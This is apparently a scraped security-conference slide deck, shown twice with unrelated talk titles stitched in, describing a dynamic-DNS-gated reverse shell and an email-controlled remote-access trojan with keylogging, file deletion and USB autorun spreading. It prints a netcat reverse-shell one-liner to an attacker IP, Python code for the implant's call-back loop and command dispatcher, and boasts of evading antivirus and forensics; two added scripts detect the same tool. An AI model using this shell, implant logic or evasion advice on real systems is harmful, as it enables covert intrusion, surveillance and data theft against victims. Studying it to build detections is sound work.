Handle Exploitation of a Remote System
      Without Being Online !!
                 By
          Merchant Bhaumik
Who Am I ?

• Currently helping local law enforcement and helping
  secure some government websites

• Developer of the IND 360 Intrusion Detection System
  (host-based as well as network-based detection)

• Communicating with the Metasploit team to develop a
  concept called "Universal Payload"
Presentation Flow

• Reverse shell using dynamic DNS concepts

• Getting data from the victim computer using an email tool
We will understand this mechanism by considering one scenario: Jack's situation.

Jack works in a company in which all computers sit behind a NAT box.

He has decided to break into one of the systems in his office and get a
shell from that office machine to his home computer.
Problems for Jack

• The company has a NIDS/IPS (network IDS), so no inbound
  connections are allowed into the office network.

• He does not know what IP address his home ISP has
  allocated to him (it changes).

• He cannot use any mechanism that constantly sends
  outbound traffic from the office machine.
Good thing for Jack

• Jack's office allows him to access his Gmail account and
  allows some outbound traffic.
I

#INCLUDE <REVERSE SHELL>
Why reverse shell?

• A reverse shell is one of the most effective methods for
  bypassing network intrusion detection systems and (most)
  firewalls.

• Many of these network controls only monitor inbound
  connections, not outbound ones.

• Jack's office has a DMZ network.
Diagram 1

[Network diagram] Jack's home machine, 49.24.3.12 (individual IP), reaches
the office over the Internet. The office DMZ / NAT box has the public IP
117.254.4.123 and fronts the internal hosts 192.168.1.1, 192.168.1.2,
192.168.1.3, 192.168.1.4 and 192.168.1.5.
Diagram 2 (Normal attack!)

[Network diagram] Same layout as Diagram 1: attacker IP 49.24.3.12 on the
Internet, office DMZ with public IP 117.254.4.123 in front of 192.168.1.1
to 192.168.1.4.

Step I (attacker): start a handler on port 4343
    nc -l -p 4343

Step II (victim): connect back to the attacker and hand over a shell
    nc 49.24.3.12 4343 -e cmd.exe
Normal flow of getting a reverse shell

Exploit!
  Step 1: Attacker starts the handler.
  Step 2: Vulnerability injection and all that.
  Step 3: Victim sends the reverse shell to the attacker's machine
          (for the reverse shell scenario).
  Step 4: Attacker wins!
But what's wrong with Jack?

He does not know what IP address is allocated to his home computer
(dynamic IP allocation by ISPs), so he cannot hard-code it into the
payload as the address to connect back to.
Solution

The attacker is "offline", but he will still get the reverse shell.
My way

Exploit!
  Step 1: Attacker starts the handler (starting the handler on the
          local machine at this point is optional!).
  Step 2: Vulnerability injection and all that.
  Step 3: Victim sends the reverse shell to the attacker's machine
          (for the reverse shell scenario).
  Step 4: Attacker wins!
Flow of execution

  Attacker
     |
  Attack
     |
  EXE running in the victim machine
     |
  Has the attacker updated the IP (DNS record)?
     |-- No:  keep running and check again
     |-- Yes: attacker receives the reverse shell

* If the attacker is not online, the EXE is still up and running in the
  remote machine; once the attacker updates the DNS records, the reverse
  shell lands on the attacker's desk!
Mechanism

• If the code (first part) receives a positive acknowledgement when it
  checks in (the dynamic DNS record has been updated), Jack gets the
  reverse shell.

• Else it keeps running in the victim machine and waits for that
  acknowledgement from the attacker's side.
Dynamic DNS way (initially!)

• First part  : catchme.dyndns-ip.com -> 255.255.255.255 (attacker not ready yet)
• Second part : payload.dyndns-ip.com -> 255.255.255.255 (no attacker IP yet)

The new final EXE consists of the first part followed by the second part,
executed synchronously as a single EXE: New.exe
Dynamic DNS way (finally!)

• First part  : catchme.dyndns-ip.com -> 127.0.0.1 (go signal: attacker is ready)
• Second part : payload.dyndns-ip.com -> attacker's current IP

The new final EXE consists of the first part followed by the second part,
executed synchronously as a single EXE: New.exe
Metasploit!

• You can embed my method (or my EXE) with the Metasploit payload of
  your choice.

• The structure of the new EXE is as follows: my tool followed by the
  MSF payload (LHOST = dynamic, resolved from the DNS name), executed
  synchronously as a single EXE: New.exe
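The two-part check-in described on the Mechanism and Dynamic DNS slides, as an added Python example that is not the presenter's tool or Metasploit code: the first part polls catchme.dyndns-ip.com and treats 255.255.255.255 as "not yet" and 127.0.0.1 as "go"; the second part then resolves payload.dyndns-ip.com for the attacker's current address and connects back. The DNS names and sentinel values come from the slides; the call-back port 4343 (matching the nc handler earlier in the deck), the poll count, and the FakeDns stand-in are assumptions so the logic runs offline. One caveat the slides do not state: every poll is a DNS query, so although the implant makes no connection attempts before the records change, it does generate periodic outbound traffic that a DNS log will record.

```python
"""
Added example (not the presenter's tool): the DNS-gated call-back logic
from the "Dynamic DNS Way" slides, with the resolver and connector
injected so the control flow can be run and tested without a network.

Assumptions not on the slides: call-back port 4343, the poll count, and
the FakeDns / fake_connect stand-ins for socket.gethostbyname and a
real connect-back.
"""
import socket
import time
from typing import Callable, Optional

GATE_NAME = "catchme.dyndns-ip.com"     # first part: "is the attacker ready?"
TARGET_NAME = "payload.dyndns-ip.com"   # second part: where to connect back
NOT_READY = "255.255.255.255"           # sentinel: keep waiting
GO = "127.0.0.1"                        # sentinel: attacker updated the records
CALLBACK_PORT = 4343                    # assumed; matches the nc handler on the slides

Resolver = Callable[[str], str]         # name -> dotted IPv4 string
Connector = Callable[[str, int], bool]  # (host, port) -> connected?


def gate_is_open(resolve: Resolver) -> bool:
    """First part: resolve the gate name; open only when it returns GO."""
    try:
        answer = resolve(GATE_NAME)
    except OSError:          # socket.gaierror is an OSError: no DNS, treat as 'not yet'
        return False
    return answer == GO


def attacker_address(resolve: Resolver) -> Optional[str]:
    """Second part: resolve the payload name; None while it still holds a sentinel."""
    try:
        answer = resolve(TARGET_NAME)
    except OSError:
        return None
    if answer in (NOT_READY, GO):
        return None          # record not yet pointed at a real host
    return answer


def wait_for_handler(resolve: Resolver, connect: Connector,
                     max_polls: int, interval: float = 0.0) -> Optional[str]:
    """
    Poll until the gate opens and the payload record holds a routable
    address, then call connect(host, CALLBACK_PORT). Returns the host on
    success, None once max_polls is exhausted. Each poll is one DNS query:
    low volume, but still periodic outbound traffic that DNS logs record.
    """
    for _ in range(max_polls):
        if gate_is_open(resolve):
            host = attacker_address(resolve)
            if host is not None and connect(host, CALLBACK_PORT):
                return host
        if interval:
            time.sleep(interval)
    return None


# --- constructed stand-ins for the real network, for an offline run ---------
class FakeDns:
    """Simulates the attacker updating both dyndns records after N lookups."""

    def __init__(self, polls_before_update: int, attacker_ip: str):
        self.calls = 0
        self.polls_before_update = polls_before_update
        self.attacker_ip = attacker_ip

    def __call__(self, name: str) -> str:
        self.calls += 1
        updated = self.calls > self.polls_before_update
        if name == GATE_NAME:
            return GO if updated else NOT_READY
        if name == TARGET_NAME:
            return self.attacker_ip if updated else NOT_READY
        raise socket.gaierror("unknown name")


def fake_connect(host: str, port: int) -> bool:
    """Pretend the connect-back succeeds only against Jack's IP from the slides."""
    return host == "49.24.3.12" and port == CALLBACK_PORT


def demo() -> Optional[str]:
    """Records flip after three lookups; the fourth poll sees GO and connects."""
    dns = FakeDns(polls_before_update=3, attacker_ip="49.24.3.12")
    return wait_for_handler(dns, fake_connect, max_polls=10)


if __name__ == "__main__":
    print(demo())  # 49.24.3.12
```

With a real resolver, pass socket.gethostbyname and a connect function that opens the socket and hands it to the shell; the gating logic is unchanged. For a defender, the fingerprint is a host repeatedly resolving the same dynamic DNS name and getting 255.255.255.255 or 127.0.0.1 back, neither of which a legitimate service would publish.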
Hands-on network

[Network diagram] Same layout as Diagram 1: 49.24.3.12 (individual IP) on
the Internet, office DMZ with public IP 117.254.4.123 in front of
192.168.1.1 to 192.168.1.5.
Time to enjoy cooked cookies and recipes!!

Demo
II

#INCLUDE <EMAIL TOOL>
Normal remote trojans & viruses!

    Attacker (must be online!)  <---->  Victim (must be online!)

My tool!!

    Caution: no need to be online, attackers!!

    Attacker (may or may not be online)  <---->  Victim (may or may not be online)
So, how does it work?

    Attacker  <---->  Zombie  <---->  Victim

But who is the zombie?

It may be any one of the webmail services shown below (Gmail, Yahoo,
Hotmail).
Features!!
  Execute operating-system-level commands by using emails!

  Get all network card information with the allocated IP addresses!

  Live tracking of the system being used by the victim!

  Get the list of all available accounts!

  Enable/disable the key logger!

All this with Gmail, Yahoo, Hotmail!!
About it!
It is a simple application which, once up and running on the victim's
computer, the attacker can control using the Gmail, Yahoo or Hotmail
email services.

There is no need for the attacker to be online to attack the victim
system.

The attacker has to send the attack instructions to any of the mail
services, and then it is like sitting at the door and watching the event,
                  "when it's gonna open!!"

As the victim connects to the internet, the attack launches and the
results are automatically sent back to the attacker's email address.
Cool benefits!!
If the email account is accessed through one of the anonymizers shown
below (Tor, a VPN or a proxy), tracing the connection back to the
attacker becomes very hard.

Create a unique password for each individual victim that is infected.

Ability to handle multiple clients simultaneously.

Delete files on the victim's computer by simply sending an email.

Network inspection cannot read the attack instructions, because all of
this traffic travels over HTTPS. (HTTPS hides the commands, not the
program: the executable itself is still visible to host-based antivirus.)
Tool syntax

    Password_For_Victim : Task_Command :

    E.g.   Pwd$98$ : Account_info :

"Pwd$98$" is the password for the particular victim; "Account_info" is
the command that sends back an email containing the account information
on the victim computer.
Snapshot 1 (load attack instructions)

[Screenshot] The instruction mail: the password for the individual
victim, followed by the tasks: send account info of the victim, send
drive info of the victim, send MAC / network card info.
Snapshot 2 (get back the attack result)

[Screenshot] The reply in my email account, with the victim computer's
information attached as per the attacker's choice.
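The instruction format from the Tool Syntax slide, parsed and routed as an added Python example (not the presenter's tool). The format "Password_For_Victim : Task_Command :" and the task Account_info are from the slides; Drive_info and Network_info are taken from the snapshot labels; the per-victim password table, the victim ids, the sample mail bodies and the placeholder handler outputs are constructed. The code only parses and routes; it does not fetch mail or collect anything from the host.

```python
"""
Added example (not the presenter's tool): parse and dispatch the
"Password_For_Victim : Task_Command :" lines from the Tool Syntax slide.

Constructed/assumed: the victim-id -> password table, the task names
Drive_info and Network_info (from the snapshot labels), the sample mail
bodies, and the placeholder strings the handlers return.
"""
import re
from typing import Callable, Dict, List, Optional, Tuple

# Attacker-side table: one unique password per infected victim
# ("create unique password for all individual victims" on the slides).
VICTIM_PASSWORDS: Dict[str, str] = {
    "victim-A": "Pwd$98$",
    "victim-B": "Qx#21!",
}

# Whitelisted task names -> handler. The real tool would collect data here;
# these handlers only return placeholders.
TASKS: Dict[str, Callable[[], str]] = {
    "Account_info": lambda: "accounts: <collected on host>",
    "Drive_info": lambda: "drives: <collected on host>",
    "Network_info": lambda: "nics: <collected on host>",
}

# "<password> : <task> :" with optional whitespace around both separators.
_INSTRUCTION = re.compile(r"^\s*([^:\s]+)\s*:\s*([A-Za-z_]+)\s*:\s*$")


def parse_instruction(line: str) -> Optional[Tuple[str, str]]:
    """Return (password, task) for a well-formed line, else None."""
    m = _INSTRUCTION.match(line)
    return (m.group(1), m.group(2)) if m else None


def build_instruction(victim_id: str, task: str) -> str:
    """Attacker side: compose the line to mail for one victim."""
    if task not in TASKS:
        raise ValueError(f"unknown task {task!r}")
    return f"{VICTIM_PASSWORDS[victim_id]} : {task} :"


def dispatch(line: str, my_password: str) -> Optional[str]:
    """
    Implant side: act only on lines carrying this victim's password and a
    whitelisted task. Returns the text to mail back, or None to ignore the
    line (bad syntax, another victim's password, unknown task).
    """
    parsed = parse_instruction(line)
    if parsed is None:
        return None
    password, task = parsed
    if password != my_password:
        return None                  # addressed to a different victim
    handler = TASKS.get(task)
    if handler is None:
        return None                  # not a task this build knows
    return handler()


def process_mailbox(bodies: List[str], my_password: str) -> List[str]:
    """Scan every line of the fetched mail bodies and run matching instructions."""
    results: List[str] = []
    for body in bodies:
        for line in body.splitlines():
            out = dispatch(line, my_password)
            if out is not None:
                results.append(out)
    return results


# Constructed sample of what an implant would pull from the shared account.
SAMPLE_BODIES = [
    "Pwd$98$ : Account_info :",
    "Qx#21! : Drive_info :",                             # for another victim
    "Pwd$98$ : Drive_info :\nPwd$98$ : Format_disk :",   # second task not whitelisted
    "hello, just a normal mail",
]

if __name__ == "__main__":
    for result in process_mailbox(SAMPLE_BODIES, "Pwd$98$"):
        print(result)
```

Because every victim polls the same shared mailbox, the per-victim password is the only thing keeping one implant from executing another's tasks, which is why the parser rejects a line on password mismatch before it even looks up the task.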
Why Gmail??

No fear of detection 1
    No direct connection between attacker and victim: both only ever
    talk to the mail service.

    Attacker  <---->  Gmail  <---->  Victim

No fear of detection 2
    No virus detection of the command traffic, because it travels over
    HTTPS and there is no network signature to match; ability to
    destruct itself!
How to spread this code?

Autorun.inf on USB drives

Physical access to the victim's system

During Metasploit exploitation
Further possible development!!

This code is flexible enough to be developed further by my hacker
friends. It is also possible in future to send exploits or trojans by
using this code.

Anyone can send exploits, trojans, rootkits or backdoors by simply
attaching them to an email and sending it to his own account, or to the
account that is configured in the victim's code.
Pros and cons 1 (be transparent!!)

The advantage is that the attacker is very hard to trace if he/she
uses Tor, an anonymizer, a VPN or any proxy for accessing the attacking
Gmail account.

No antivirus can inspect the instruction data on the wire, because all
the traffic comes over HTTPS.

Only a single Gmail account is used for both sides. The attacker and the
victim machine both connect to the same account, but the attacker knows
it and the victim does not!!
Pros and cons 2

The disadvantage is that if the victim has the habit of checking the
current connections with a command like 'netstat -n', there is a chance
of noticing a Gmail connection when there is actually no browser
activity. It is still difficult to detect, because the process runs in
hidden (windowless) mode; note, however, that 'netstat -ano' also lists
the owning PID of each connection, so a hidden process can still be
tied to its socket.
Hands-on time!
   (Demo)
For more

backdoor.security@gmail.com

Thanks guys
for checking
it out!
Designing A Time bound resource download URLDesigning A Time bound resource download URL
Designing A Time bound resource download URL
 
Salesforce Miami User Group Event - 1st Quarter 2024
Salesforce Miami User Group Event - 1st Quarter 2024Salesforce Miami User Group Event - 1st Quarter 2024
Salesforce Miami User Group Event - 1st Quarter 2024
 
Introduction to Quantum Computing
Introduction to Quantum ComputingIntroduction to Quantum Computing
Introduction to Quantum Computing
 
20200723_insight_release_plan_v6.pdf20200723_insight_release_plan_v6.pdf
20200723_insight_release_plan_v6.pdf20200723_insight_release_plan_v6.pdf20200723_insight_release_plan_v6.pdf20200723_insight_release_plan_v6.pdf
20200723_insight_release_plan_v6.pdf20200723_insight_release_plan_v6.pdf
 
IESVE Software for Florida Code Compliance Using ASHRAE 90.1-2019
IESVE Software for Florida Code Compliance Using ASHRAE 90.1-2019IESVE Software for Florida Code Compliance Using ASHRAE 90.1-2019
IESVE Software for Florida Code Compliance Using ASHRAE 90.1-2019
 
Comparing Sidecar-less Service Mesh from Cilium and Istio
Comparing Sidecar-less Service Mesh from Cilium and IstioComparing Sidecar-less Service Mesh from Cilium and Istio
Comparing Sidecar-less Service Mesh from Cilium and Istio
 
UWB Technology for Enhanced Indoor and Outdoor Positioning in Physiological M...
UWB Technology for Enhanced Indoor and Outdoor Positioning in Physiological M...UWB Technology for Enhanced Indoor and Outdoor Positioning in Physiological M...
UWB Technology for Enhanced Indoor and Outdoor Positioning in Physiological M...
 
Machine Learning Model Validation (Aijun Zhang 2024).pdf
Machine Learning Model Validation (Aijun Zhang 2024).pdfMachine Learning Model Validation (Aijun Zhang 2024).pdf
Machine Learning Model Validation (Aijun Zhang 2024).pdf
 
Crea il tuo assistente AI con lo Stregatto (open source python framework)
Crea il tuo assistente AI con lo Stregatto (open source python framework)Crea il tuo assistente AI con lo Stregatto (open source python framework)
Crea il tuo assistente AI con lo Stregatto (open source python framework)
 
KubeConEU24-Monitoring Kubernetes and Cloud Spend with OpenCost
KubeConEU24-Monitoring Kubernetes and Cloud Spend with OpenCostKubeConEU24-Monitoring Kubernetes and Cloud Spend with OpenCost
KubeConEU24-Monitoring Kubernetes and Cloud Spend with OpenCost
 
Secure your environment with UiPath and CyberArk technologies - Session 1
Secure your environment with UiPath and CyberArk technologies - Session 1Secure your environment with UiPath and CyberArk technologies - Session 1
Secure your environment with UiPath and CyberArk technologies - Session 1
 
Spring24-Release Overview - Wellingtion User Group-1.pdf
Spring24-Release Overview - Wellingtion User Group-1.pdfSpring24-Release Overview - Wellingtion User Group-1.pdf
Spring24-Release Overview - Wellingtion User Group-1.pdf
 
COMPUTER 10: Lesson 7 - File Storage and Online Collaboration
COMPUTER 10: Lesson 7 - File Storage and Online CollaborationCOMPUTER 10: Lesson 7 - File Storage and Online Collaboration
COMPUTER 10: Lesson 7 - File Storage and Online Collaboration
 
Bird eye's view on Camunda open source ecosystem
Bird eye's view on Camunda open source ecosystemBird eye's view on Camunda open source ecosystem
Bird eye's view on Camunda open source ecosystem
 

Handle Exploitation of Remote System Without Being Online (Merchant Bhaumik)

  • 1. Handle Exploitation of Remote System Without Being Online!! By Merchant Bhaumik
  • 6. Who Am I?
    • Currently helping local law enforcement and helping to secure some government websites
    • Developer of the IND 360 Intrusion Detection System (host-based as well as network-based detection)
    • Communicating with the Metasploit guys to develop a term called "Universal Payload"
  • 7. Presentation Flow
    • Reverse shell using dynamic DNS concepts
    • Getting data from the victim computer using an email tool
  • 8. We will understand this mechanism by considering one scenario.
  • 9. Jack's Situation
    • Jack works in a company in which all computers are behind the NAT box.
    • He has decided to break into one of the systems in his office and get a shell from the office to his home computer.
  • 10. Problems for Jack
    • The company has a NIDS/IPS (network IDS), so no inbound connections.
    • He doesn't know what IP address is allocated to him by his ISP.
    • He can't use any mechanism which constantly sends outbound traffic.
  • 11. Good Thing for Jack
    • Jack's office allows him to access his Gmail account and allows some outbound traffic.
  • 13. Why Reverse Shell?
    • A reverse shell is one of the powerful methods for bypassing network intrusion detection systems, (most) firewalls, etc.
    • Because some of these network intrusion detection systems only monitor inbound connections, not outbound ones.
    • Jack has a DMZ network in his office.
  • 14. Diagram 1 (network diagram; only the labels are recoverable from the text): a DMZ with hosts 192.168.1.1 through 192.168.1.5 sitting behind the public IP 117.254.4.123, reached across the Internet from the individual IP 49.24.3.12.
  • 15. Diagram 2 (Normal Attack!): the same network, with 49.24.3.12 labelled as the attacker IP and one DMZ host labelled as the victim.
    • Step I: start the handler on port 4343: nc -l -p 4343
    • Step II (on the victim): nc 49.24.3.12 4343 -e cmd.exe
  • 16. Normal flow of getting a reverse shell (flowchart): Attacker starts handler → Exploit! (vulnerability injection and all that) → Victim sends reverse shell to the attacker machine (for the reverse shell scenario) → Attacker wins!
  • 17. But what's wrong with Jack? He doesn't know what IP address is allocated to his computer (dynamic IP allocation by ISPs).
  • 18. Solution: the attacker is "offline" but still he will get the reverse shell.
  • 19. My Way (flowchart): Attacker starts handler (starting the handler on the local machine is optional!) → Exploit! (vulnerability injection and all that) → Victim sends reverse shell to the attacker machine (for the reverse shell scenario) → Attacker wins!
  • 20. Flow of execution (flowchart): the attack exe runs in the victim machine and checks "Did the attacker update the IP?" No: keep running (even if the attacker is not online, the exe is still up and running in the remote machine). Yes: once the attacker updates the DNS records, the reverse shell is on the attacker's desk and the attacker receives it.
  • 21. Mechanism
    • If the code (first part) receives a positive acknowledgement when sending packets, Jack will get the reverse shell.
    • Else it keeps running in the victim machine and waits for the ack from the attacker's machine.
  • 22. Dynamic DNS Way (initially!)
    • First part: catchme.dyndns-ip.com (255.255.255.255)
    • Second part: payload.dyndns-ip.com (255.255.255.255)
    • The new final EXE (New.exe) consists of the first part and the second part, executed synchronously in a single EXE.
  • 23. Dynamic DNS Way (finally!)
    • First part: catchme.dyndns-ip.com (127.0.0.1)
    • Second part: payload.dyndns-ip.com (attacker's IP)
    • The new final EXE (New.exe) consists of the first part and the second part, executed synchronously in a single EXE.
  • 24. Metasploit!
    • You can embed my method (or my exe) with the Metasploit payload of your choice.
    • The structure of the new exe is as follows: the new final EXE (New.exe) consists of my tool and the MSF payload (LHOST = dynamic), executed synchronously in a single EXE.
  • 25. Hands-on network (the same network diagram as Diagram 1: DMZ hosts 192.168.1.1 through 192.168.1.5 behind the public IP 117.254.4.123, with the individual IP 49.24.3.12 across the Internet).
  • 26. Time to enjoy cooked cookies and recipes!!
  • 27. Demo
  • 29. Normal remote trojans and viruses: the attacker (must be online!) and the victim (must be online!).
  • 30. My Tool!! Caution, attackers: no need to be online!! The attacker may or may not be online; the victim may or may not be online.
  • 31. So, how does it work? Attacker → Zombie → Victim.
  • 32. But who is the zombie? It may be one of the below (three examples shown as images; not recoverable from the text).
  • 33. Features
    • Execute operating-system-level commands by using emails!
    • Get all network card information with allocated IP addresses!
    • Live tracking of the system being used by the victim!
    • Get the list of all available accounts!
    • Enable/disable the keylogger!
    • All this with Gmail, Yahoo, Hotmail!
  • 34. About It: it is a simple application which, once up and running on the victim's computer, the attacker can handle using the Gmail, Yahoo or Hotmail email services. There is no need for the attacker to be online to attack the victim system. The attacker has to send attack instructions to any of the mail services, and then it is like sitting at the door and watching for the event, "when it's gonna open!!" As the victim connects to the internet, the attack launches and the results are automatically sent back to the attacker's email address.
  • 35. Cool Benefits
    • If the email account is accessed using one of the below (shown as images), then it is totally anti-forensic: no reverse detection is possible!
    • Create a unique password for each individual infected victim.
    • Ability to handle multiple clients simultaneously.
    • Delete files on the victim's computer by simply sending an email.
    • No antivirus can detect the attack because of HTTPS.
  • 36. Tool Syntax: Password_For_Victim ":" Task_Commands ":" e.g. Pwd$98$ : Account_info : where "Pwd$98$" is the password for the particular victim and Account_info is the command which sends back an email containing the account info from the victim computer.
  • 37. Snapshot 1 (load attack instructions): screenshot showing the password for the individual victim and the commands to send the victim's account info, the victim's drive info, and the MAC/network card info.
  • 38. Snapshot 2 (get back attack result): screenshot of my email account with the attached info from the victim's computer, as per the attacker's choice.
  • 40. No Fear of Detection 1: no direct connection between attacker and victim.
  • 41. No Fear of Detection 2: no virus detection due to HTTPS; no digital signatures!! Ability to destruct itself!
  • 42. How to spread this code? Autorun.inf via USB drives; physical access to the victim's system; during Metasploit exploitation.
  • 43. Further possible development: this code is flexible enough to be developed further by my hacker friends. It is also possible in future to send exploits or trojans using this code. Anyone can send exploits, trojans, rootkits or backdoors by simply attaching them to an email and sending it to his own account or to the account that is configured in the victim's code.
  • 44. Pros and Cons 1 (Be transparent!!): the advantage is that the attacker is never going to get caught if he/she uses TOR, Anonymizer, VPNs or any proxy to access the attacking Gmail account. No antivirus can detect the instruction data because all traffic comes over HTTPS! Only a single Gmail account is used for both sides: the attacker and victim machines both connect to the same account, but the attacker knows and the victim doesn't!!
  • 45. Pros and Cons 2: the disadvantage is that, if the victim has the habit of checking the current connections using commands like 'netstat -n', then there is a possibility of detecting the Gmail connection when there is actually no browser activity. But it is still difficult to detect, because the process runs in hidden mode.
  • 46. Hands-on time! (Demo)
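As an added defender-side example (not code from the presentation or its author), the dynamic-DNS mechanism on slides 20 to 23 leaves a usable trace in resolver logs: the implant polls a fixed name, and the answer changes from a placeholder (255.255.255.255, or 127.0.0.1 for the "go" signal) to a routable address once the attacker updates the record. The script below parses constructed resolver log lines in a simple timestamp/client/qname/answer format and reports a name that was polled repeatedly and either stayed on placeholder answers or flipped from a placeholder to a public address. The log format, the client addresses and the three-poll threshold are assumptions; the dyndns-ip.com names and 49.24.3.12 are taken from the slides.

```python
"""Hunt resolver logs for the dynamic-DNS "sentinel" pattern: a name polled
repeatedly whose answer is a non-routable placeholder until it flips to a
public address. Added example; log format and thresholds are assumptions."""
import ipaddress
import re
from collections import defaultdict
from datetime import datetime

# Constructed resolver log: "timestamp client qname answer". The dyndns-ip.com
# names and 49.24.3.12 come from the slides; everything else is made up.
SAMPLE_LOG = """\
2024-03-01T08:00:01 192.168.1.4 catchme.dyndns-ip.com 255.255.255.255
2024-03-01T08:00:01 192.168.1.4 payload.dyndns-ip.com 255.255.255.255
2024-03-01T08:05:02 192.168.1.4 catchme.dyndns-ip.com 255.255.255.255
2024-03-01T08:05:02 192.168.1.4 payload.dyndns-ip.com 255.255.255.255
2024-03-01T08:10:03 192.168.1.4 catchme.dyndns-ip.com 127.0.0.1
2024-03-01T08:10:03 192.168.1.4 payload.dyndns-ip.com 49.24.3.12
2024-03-01T08:00:05 192.168.1.3 www.example.com 93.184.216.34
2024-03-01T08:30:05 192.168.1.3 www.example.com 93.184.216.34
"""

LINE_RE = re.compile(r"^(\S+)\s+(\S+)\s+(\S+)\s+(\S+)$")
SENTINELS = {ipaddress.ip_address("255.255.255.255"), ipaddress.ip_address("127.0.0.1")}


def parse_log(text):
    """Yield (timestamp, client, qname, answer) tuples; malformed lines are skipped."""
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        ts, client, qname, answer = m.groups()
        try:
            yield datetime.fromisoformat(ts), client, qname.lower(), ipaddress.ip_address(answer)
        except ValueError:
            continue


def is_placeholder(ip):
    """True for answers that cannot be a live endpoint: the slide's sentinels,
    loopback, unspecified, or otherwise reserved addresses."""
    return ip in SENTINELS or ip.is_loopback or ip.is_unspecified or ip.is_reserved


def find_sentinel_patterns(text, min_polls=3):
    """Return one finding per (client, qname) that was polled at least min_polls
    times and either flipped from a placeholder to a public answer or never left
    placeholder answers. Findings are dicts sorted by client and name."""
    series = defaultdict(list)
    for ts, client, qname, ip in parse_log(text):
        series[(client, qname)].append((ts, ip))

    findings = []
    for (client, qname), events in sorted(series.items()):
        events.sort(key=lambda e: e[0])
        if len(events) < min_polls:
            continue
        placeholder_seen, flipped = False, None
        for ts, ip in events:
            if is_placeholder(ip):
                placeholder_seen = True
            elif placeholder_seen and ip.is_global:
                flipped = (str(ip), ts.isoformat())  # first public answer after a placeholder
                break
        base = {"client": client, "qname": qname, "polls": len(events)}
        if flipped:
            findings.append(dict(base, kind="flipped_to_public", answer=flipped[0], at=flipped[1]))
        elif placeholder_seen and all(is_placeholder(ip) for _, ip in events):
            findings.append(dict(base, kind="placeholder_polling", answer=None, at=None))
    return findings


if __name__ == "__main__":
    for f in find_sentinel_patterns(SAMPLE_LOG):
        print(f)
```

In the constructed log the detection reports catchme.dyndns-ip.com as placeholder polling (its flip is to 127.0.0.1, still non-routable) and payload.dyndns-ip.com as flipped to the public address 49.24.3.12 at 08:10:03, which is the moment the reverse connection would be attempted. On a real resolver the same logic runs over the query log of the DNS forwarder; the poll threshold and the set of dynamic-DNS provider domains to prioritise should be tuned to the environment.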
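Slide 45 itself names the check a defender has against the email-controlled tool: a connection to the mail service showing in `netstat -n` while no browser is open. The script below, an added example rather than the presentation's tool, parses constructed output in the style of Windows `netstat -nob` (which prints the owning process name in brackets under each connection when it can be determined) and flags established connections on mail-protocol ports, or on HTTP(S) from a process outside a browser/mail-client allowlist. The process names, the 203.0.113.0/24 addresses and the allowlist are constructed for the example and would be replaced by the host's own baseline.

```python
"""Flag established connections that a mail-polling implant would produce,
from `netstat -nob`-style output. Added example; the sample text, the
allowlist and the port sets are assumptions, not a vendor reference."""
import re

# Constructed sample in the style of Windows `netstat -nob`: a bracketed process
# name follows each connection, or a notice when the owner cannot be looked up.
# Process names and the 203.0.113.0/24 (TEST-NET-3) addresses are made up.
SAMPLE_NETSTAT = """\
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    192.168.1.4:49712      203.0.113.10:443       ESTABLISHED     4120
 [chrome.exe]
  TCP    192.168.1.4:49850      203.0.113.10:443       ESTABLISHED     3308
 [updater.exe]
  TCP    192.168.1.4:49901      192.168.1.2:445        ESTABLISHED     4
  Can not obtain ownership information
  TCP    192.168.1.4:49933      203.0.113.10:993       ESTABLISHED     3308
 [updater.exe]
  TCP    192.168.1.4:49950      203.0.113.20:443       TIME_WAIT       0
"""

CONN_RE = re.compile(r"^\s*TCP\s+(\S+)\s+(\S+)\s+(\S+)\s+(\d+)\s*$")
PROC_RE = re.compile(r"^\s*\[(.+)\]\s*$")

# Ports an implant polling a mailbox directly would use (POP/IMAP/SMTP submission).
MAIL_PORTS = {110, 143, 465, 587, 993, 995}
WEB_PORTS = {80, 443}
# Assumed allowlist: processes expected to reach webmail or mail servers on this host.
ALLOWED_PROCESSES = {"chrome.exe", "firefox.exe", "msedge.exe", "iexplore.exe",
                     "outlook.exe", "thunderbird.exe"}


def parse_netstat(text):
    """Return TCP connection dicts; a bracketed line directly after a connection
    supplies its process name, anything else leaves the process unknown."""
    records, pending = [], None
    for line in text.splitlines():
        m = CONN_RE.match(line)
        if m:
            local, foreign, state, pid = m.groups()
            rhost, _, rport = foreign.rpartition(":")
            pending = {"local": local, "remote_host": rhost, "remote_port": int(rport),
                       "state": state, "pid": int(pid), "process": None}
            records.append(pending)
            continue
        m = PROC_RE.match(line)
        if m and pending is not None:
            pending["process"] = m.group(1).lower()
        pending = None  # any other line closes the current connection's entry
    return records


def suspicious_mail_connections(text, allowlist=ALLOWED_PROCESSES):
    """Return (pid, process, remote_host, remote_port, reason) for established
    connections from non-allowlisted processes to mail or web ports."""
    hits = []
    for r in parse_netstat(text):
        if r["state"] != "ESTABLISHED":
            continue
        proc = r["process"] or "<unknown>"
        if proc in allowlist:
            continue
        if r["remote_port"] in MAIL_PORTS:
            hits.append((r["pid"], proc, r["remote_host"], r["remote_port"],
                         "mail protocol port from a non-mail-client process"))
        elif r["remote_port"] in WEB_PORTS:
            hits.append((r["pid"], proc, r["remote_host"], r["remote_port"],
                         "HTTP(S) from a non-browser process"))
    return hits


if __name__ == "__main__":
    for hit in suspicious_mail_connections(SAMPLE_NETSTAT):
        print("pid %d %s -> %s:%d (%s)" % hit)
```

The HTTP(S) rule is a hunting filter rather than an alert: many legitimate processes use port 443, so the allowlist has to be built from the host's own baseline before the rule is useful, whereas a non-mail process holding an IMAPS or SMTP submission connection is rare enough to review every time. Because the slide's tool hides its process, the PID and owner here come from the kernel's socket table, which is why `-o`/`-b` output (or the equivalent EDR telemetry) is the right source rather than the process list.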